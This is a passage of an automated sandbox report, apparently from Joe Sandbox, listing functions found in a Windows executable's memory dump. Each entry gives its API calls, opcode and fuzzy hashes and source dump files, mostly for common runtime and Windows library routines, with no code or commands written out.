                                                        • Instruction ID: a9853cdfad1140a9d804597ddb10eee05615126720068d3c607db080dfb98d4b
                                                        • Opcode Fuzzy Hash: ea4125342bd4bac1772d1d8899cdb601593b7fbe57cae896892b32ae53872223
                                                        • Instruction Fuzzy Hash: E7A1A062F15A5696FF00AF7AD8A45BDB321AB44BE4B905231DF3D17BC9DE3CE0418290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D86900 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: b19f735c2fc22cb40e9aa071b726c9969eab177a3aaad958e6e5f50a2ca54230
                                                        • Instruction ID: c49e9d654bb09d71c79a5c1d5600d4ecd20b6f25589b0b278cb98d911a19135b
                                                        • Opcode Fuzzy Hash: b19f735c2fc22cb40e9aa071b726c9969eab177a3aaad958e6e5f50a2ca54230
                                                        • Instruction Fuzzy Hash: A3315E72609B858AEB60AF66E8803EDB364FB44758F844039DB5D47BD9DF38C548C760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8AC28 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 91f6c71151a94394cd8503301a90eeb37f847c0064739d62fe8d487df189b3c5
                                                        • Instruction ID: e1eb004ac6c399c338c7bd7b48e33141ffe139aae68984ab1841c047fc4eb3f4
                                                        • Opcode Fuzzy Hash: 91f6c71151a94394cd8503301a90eeb37f847c0064739d62fe8d487df189b3c5
                                                        • Instruction Fuzzy Hash: 6A318336608B8586DB24DF26E8802BEB3A4FB84754F900135EBAD43BA5DF3CC545CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D92EE4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F4D92F14
                                                          • Part of subcall function 00007FF7F4D8AE84: GetCurrentProcess.KERNEL32(00007FF7F4D9411D), ref: 00007FF7F4D8AEB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                        • String ID: *?$.
                                                        • API String ID: 2518042432-3972193922
                                                        • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                        • Instruction ID: d56ae510ba437c42d410cd6a7df86e43c56138ec618b76dbef4c24311661945f
                                                        • Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                        • Instruction Fuzzy Hash: AB51C262B1569546FB11EF63D8804B9B7A4FB48BD8B844532EF2D57BC5DE3CD0418360
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D954D0 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: memcpy_s
                                                        • String ID:
                                                        • API String ID: 1502251526-0
                                                        • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                        • Instruction ID: da8ea6922841f073f92cc34a1e2faedec029532ea57241b79a126adb9e0f7354
                                                        • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                        • Instruction Fuzzy Hash: C2D1F533B1928687EB74DF16E5D466AB7A1F788784F948134CB5E97B84DA3CE801CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D63BF8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F4D6FD0F), ref: 00007FF7F4D63C05
                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F4D6FD0F), ref: 00007FF7F4D63C39
                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F4D6FD0F), ref: 00007FF7F4D63C63
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                        • String ID:
                                                        • API String ID: 1365068426-0
                                                        • Opcode ID: 40584bd50e56abfa42d30d5238e6f3c450c42cf4bf47e2a503ba7e13edba453c
                                                        • Instruction ID: 6c8accfad9eab14ba98d04340be145758b08a493909c52ec7034b814bcefc283
                                                        • Opcode Fuzzy Hash: 40584bd50e56abfa42d30d5238e6f3c450c42cf4bf47e2a503ba7e13edba453c
                                                        • Instruction Fuzzy Hash: B1012171709B4693D710AF17F8C017AB391BB8ABC0F854034EBAD86B85CE3CD5148750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D930F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: da297268851f0dad731dc14ad2341fe3f8b0674bdc4fe7056fefc165238299ef
                                                        • Instruction ID: 33c7654a82531f1a0c8fe05805adb3c4183696a01a6f78024d22b43a1c1020b6
                                                        • Opcode Fuzzy Hash: da297268851f0dad731dc14ad2341fe3f8b0674bdc4fe7056fefc165238299ef
                                                        • Instruction Fuzzy Hash: 3C31C522B1869546EB20AE63EC457A9BA91AB48BE4F848635DF7C47BD5CE3CD5018340
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D98FC8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise_clrfp
                                                        • String ID:
                                                        • API String ID: 15204871-0
                                                        • Opcode ID: 06edcf5cf4dff743b823cf551a0825fa65dd09d8c660a7c3592381f100fbb939
                                                        • Instruction ID: 7c165986373f25d000abbbf2ce36cc844954e2ca12aca8bd379a35b9c76069f7
                                                        • Opcode Fuzzy Hash: 06edcf5cf4dff743b823cf551a0825fa65dd09d8c660a7c3592381f100fbb939
                                                        • Instruction Fuzzy Hash: B6B14873604B888BEB19DF2AC8863687BA0F744B8CF558971DB6D837A8CB39D451C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7C9F0 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ObjectRelease$CapsDevice
                                                        • String ID:
                                                        • API String ID: 1061551593-0
                                                        • Opcode ID: ff042b815f02e026fc3a69f6fa17aa22f2e26b04c76e1e8886377e325206ff29
                                                        • Instruction ID: caeef4e789d4df9b6e09f25b4c5ece789aa62add1d85a2973f1864268dce5897
                                                        • Opcode Fuzzy Hash: ff042b815f02e026fc3a69f6fa17aa22f2e26b04c76e1e8886377e325206ff29
                                                        • Instruction Fuzzy Hash: CF812B26B18A598AEB10DF66D8806ADB771FB88F88B804136DF1D577A4DF3CD105C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7DE04 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FormatInfoLocaleNumber
                                                        • String ID:
                                                        • API String ID: 2169056816-0
                                                        • Opcode ID: c5aacc7d3bf90c30aa8a4618c48231a2257dd42d29752bb85db0feb902625d90
                                                        • Instruction ID: 303928d1bbf6a2ff854c9fd05737a2b5c757df51480d21cb3730a05d136a1bf9
                                                        • Opcode Fuzzy Hash: c5aacc7d3bf90c30aa8a4618c48231a2257dd42d29752bb85db0feb902625d90
                                                        • Instruction Fuzzy Hash: 36111D62A18B8596E721AF22F8903E9B361FF88B44F844135DB5D037A9DF3CD245C794
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D66768 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Version
                                                        • String ID:
                                                        • API String ID: 1889659487-0
                                                        • Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                        • Instruction ID: bc3b2e1068c12707358b0b16fd9fe7ef9fad2b5a54e4dba50c41ac9a3d31dfa6
                                                        • Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                        • Instruction Fuzzy Hash: 8E01297AA089429BE724AF06E890375B3A1FB98710F900235D7AE427D4DF3CE5058E60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8C034 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: 0
                                                        • API String ID: 3215553584-4108050209
                                                        • Opcode ID: 8a078738266dd42ed559e37769a38083d9671446fa6f8f15044a9e5823959058
                                                        • Instruction ID: bae754a41957c42bb5761a5084646e8fb189947ae4bc3fcfdd5e97f87ad2f09b
                                                        • Opcode Fuzzy Hash: 8a078738266dd42ed559e37769a38083d9671446fa6f8f15044a9e5823959058
                                                        • Instruction Fuzzy Hash: AF81A122A18242C7EBA4AE17C4C067DB2E1BB41FC4F941531DF29977D9CE2DE84696E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8BDB8 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: 0
                                                        • API String ID: 3215553584-4108050209
                                                        • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                        • Instruction ID: 0e7bfa9ae6c89d13faff2d32456e3af58c43976128ce0747d249097bb1d193e6
                                                        • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                        • Instruction Fuzzy Hash: 8971D321A196424BE7656E17D0C027DF390BF41B44F941536FF288B6DACF2EE8468BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8FCD8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: d46d2d3bf678a46395eb5f5669d2d3d1460b5a19965d13b7a0c752fab2dc10ff
                                                        • Instruction ID: 098bb5064ab4d0d2ce0f56392aa5ee165ed1f31157f21a46028eb9cf65c6e1eb
                                                        • Opcode Fuzzy Hash: d46d2d3bf678a46395eb5f5669d2d3d1460b5a19965d13b7a0c752fab2dc10ff
                                                        • Instruction Fuzzy Hash: 4D418C32714A4586EF04AF2AD8942A9B3A1F758FD4B89A036DF5D87795EE3CD141C340
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D94170 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: fb17e31c4336a6e786549368164ea907063e7b7d29ca402ec9a733d541c9e3a8
                                                        • Instruction ID: e23d419409d15eb8b5460699de29409e0b83e54b0974300c9af1701d9e48b39d
                                                        • Opcode Fuzzy Hash: fb17e31c4336a6e786549368164ea907063e7b7d29ca402ec9a733d541c9e3a8
                                                        • Instruction Fuzzy Hash: A0B09220E07A0AC7EB083F12BCC221872A8BF48B01FD58039C25C813A0DE2C60A58BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6BF08 Relevance: .6, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43769c6bae4104b0ec7f69f72cb22ead7c75c3f90e791b6b37d14b87d96b02d3
                                                        • Instruction ID: 29120d04e1ccad1bb81a06c6b7b9802640718c08792f965291f3605917db2fa8
                                                        • Opcode Fuzzy Hash: 43769c6bae4104b0ec7f69f72cb22ead7c75c3f90e791b6b37d14b87d96b02d3
                                                        • Instruction Fuzzy Hash: 67220673B246508BD728CF26D89AE5E3766F798744B4B8228DF0ACB785DB38D505CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6B314 Relevance: .3, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
